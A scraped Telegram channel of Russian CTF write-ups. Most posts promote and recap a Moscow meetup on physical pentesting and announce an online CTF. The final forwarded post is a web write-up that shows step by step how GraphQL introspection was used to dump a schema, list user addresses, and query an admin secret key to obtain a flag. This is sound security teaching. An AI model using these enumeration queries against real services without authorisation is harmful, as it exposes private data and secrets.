Райтапы по CTF{2026}
3.82K subscribers
264 photos
26 videos
88 files
458 links
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш чатик: @writeup_chat

✍️ По любому вопросу можно писать мне: @freenameruuuu

Таски решать тут: @writeup_ctf_bot
Download Telegram
🚨 Митап по физическому пентесту — 29 января, Москва!

Хочешь узнать, как выглядит полный цикл физического пентеста — от OSINT до проникновения в офис?

Тогда тебе сюда 👇
📅 Когда: 29 января, 18:00–21:00 (МСК)

📍 Где: офис Solar на Никитском
В программе — практические доклады и живой мастер‑класс:

🕕 18:10–18:50 — Егор Зайцев (Head of Research, автор канала pro_pentest)
Тема: «Физический пентест: от OSINT до полной компрометации компании»

🕕 18:50–19:30 — Андрей Зенин (специалист по внешнему пентесту, OSWE)
Тема: «Физический пентест: этапы, практика и реальные кейсы»

🕕 19:35–20:15 — Александр Хабибуллин (CyberOK)
Тема: «O.MG Cable: доверие к USB обернулось атакой»

🕕 20:15–21:00 — Никита Петров (Solar, автор канала Райтапы по CTF)
Мастер‑класс: практический локпикинг — взлом замков своими руками 🔐

Не упусти возможность пообщаться с экспертами, узнать о реальных кейсах и попробовать инструменты физического пентеста вживую.

Ура, мой первый митап, который я придумал и организовываю! Приходите!

🎟 Вход по регистрации — количество мест ограничено!

Запись постараемся сделать!

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
11109🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥33
Forwarded from TaipanByte CTF
Анонсируем
TaipanByte’s Chart CTF!🤩

📅 Когда:
14 февраля 2026, 10:00 UTC — 15 февраля 2026, 10:00 UTC

➡️ Где:
https://chart.taipanbyte.ru/
(Подробная информация на CTFtime)

➡️ Формат:
Jeopardy (Task-Based)

😀 Что за CTF:

TaipanByte’s Chart CTF — это онлайн-соревнование по информационной безопасности от нашей команды - TaipanByte. В фокусе мероприятия — задачи по различным направлениям, включая Beginners, GEOINT, OSINT, Misc и Crypto.

📱 Канал |🐍 CTF Платформа
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥91
Райтапы по CTF{2026}
🚨 Митап по физическому пентесту — 29 января, Москва! Хочешь узнать, как выглядит полный цикл физического пентеста — от OSINT до проникновения в офис? Тогда тебе сюда 👇 📅 Когда: 29 января, 18:00–21:00 (МСК) 📍 Где: офис Solar на Никитском В программе —…
Закрыли регистрацию!
Желающих очень много, ОЧЕНЬ!

За 3 дня до мероприятия вам придет подтверждение с подробной информацией

Всем спасибо, постараемся сделать запись митапа

P.S:
Если у кого-то есть петлички и оборудование и он готов нам в этом помочь в организации записил или онлайн трансляции, напишите @freenameruuuu

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥102
Студенты!
С вашим днем! 🥳

за картинку спасибо @Pep_macgvai
Please open Telegram to view this post
VIEW IN TELEGRAM
52🔥13
Всем спасибо, кто пришел на наш митап по физическому пентесту!

Надеюсь, вам понравилось!

Запись будет позже!

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
41🔥224😱21
Райтапы по CTF{2026}
🚨 Митап по физическому пентесту — 29 января, Москва! Хочешь узнать, как выглядит полный цикл физического пентеста — от OSINT до проникновения в офис? Тогда тебе сюда 👇 📅 Когда: 29 января, 18:00–21:00 (МСК) 📍 Где: офис Solar на Никитском В программе —…
Если на этот пост, поставить огонечки и сердечки, то можно ускорить загрузку видео с митапа по физическому пентесту

А еще подпишитесь на 📺 RUTUBE, чтобы ничего не пропустить!

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥681561
💥 Записали митап по физическому пентесту — теперь всё лежит на RUTUBE.

29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG Cable.

В плейлисте три доклада:

🔹 Егор Зайцев (@pro_pentest) — «Физический пентест: от OSINT до полной компрометации компании»
🔹 Андрей Зенин (Бастион) — «Физический пентест: этапы, практика и реальные кейсы»
🔹 Александр Хабибуллин (CyberOK) — «O.MG Cable: доверие к USB обернулось атакой»

Если интересен реальный физический редтимминг, социальная инженерия и практические кейсы с полей — залетай смотреть.

👉 Плейлист тут:
https://rutube.ru/plst/1456882/

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
20
Райтапы по CTF{2026}
💥 Записали митап по физическому пентесту — теперь всё лежит на RUTUBE. 29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG…
Друзья, я знаю, что вам не хватило времени задать свои вопросы Егору, и именно поэтому мы решили провести СТРИМ-поскриптум, где ответим на всё, что вас интересует!

Форма, куда можно отправить свой вопрос:
https://forms.yandex.ru/u/6984a1da90fa7b1a56545f8c/

На всякий случай — запись доклада для тех, кто ещё не посмотрел:
https://rutube.ru/video/a54900346f6b71186397e2e232839c18/

Стрим проведём 13 февраля — включайте уведомления, чтобы не пропустить!

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
11453
Forwarded from InfoSec VK Hub
Всем привет!

А вот и финальный разбор в нашей серии! Последний пазл, флаг за который дал целых 400 очков. Иногда самая простая ошибка — оставить introspection в GraphQL — становится очень дорогой...

Persik ICO Writeup
category: web, points: 400

Airdrop токена Persik уже прошёл, а вы - опоздали ... но сервис хранит больше данных, чем должен!
Достаньте любой eligible-адрес и заберите флаг
После подключения кошелька видно, что для проверки участвует ли адрес в airdrop'е отсылается GraphQL query checkAirdrop на эндпойнт /graphql. Увидим, что по этому пути нам доступен GraphiQL.


Проверим включена ли introspection:
query { __schema { types { name kind fields { name type { name kind } } } } }

Из схемы составим query getEligibleUsers и получим список список адресов участников airdrop'а:
query GetEligibleUsers { getEligibleUsers { address tokensClaimed airdropEligible } }

Выберем любой адрес и передадим его в checkAirdrop:
query CheckAirdrop($addr: String!) { checkAirdrop(address: $addr) { address tokensClaimed airdropEligible flag } }
И получим флаг:
{
  "data": {
    "checkAirdrop": {
      "address": "0x8ba1f109551bD432803012645aac136c22C19e00",
      "tokensClaimed": 3000,
      "airdropEligible": true,
      "flag": "vkctf{edd3417a9eb5c85b361d196e504b05a0}"
    }
  }
}

Опционально можно было использовать адрес администратора из admin query:
query AdminInfo { admin { secretKey vaultAddr } }


На этом серия разборов подходит к концу. Мы прошли путь от базовых уязвимостей до тонкостей GraphQL, где одна невыключенная настройка открыла доступ ко всей логике и данным сервиса. Этот таск — отличное напоминание: безопасность API часто ломается на самых простых вещах: забытых отладочных интерфейсах, излишней детализации ошибок или избыточных правах.

Предыдущие разборы серии:

1 часть
2 часть
3 часть

VK Security | Буст этому каналу

#разбор #CTF
94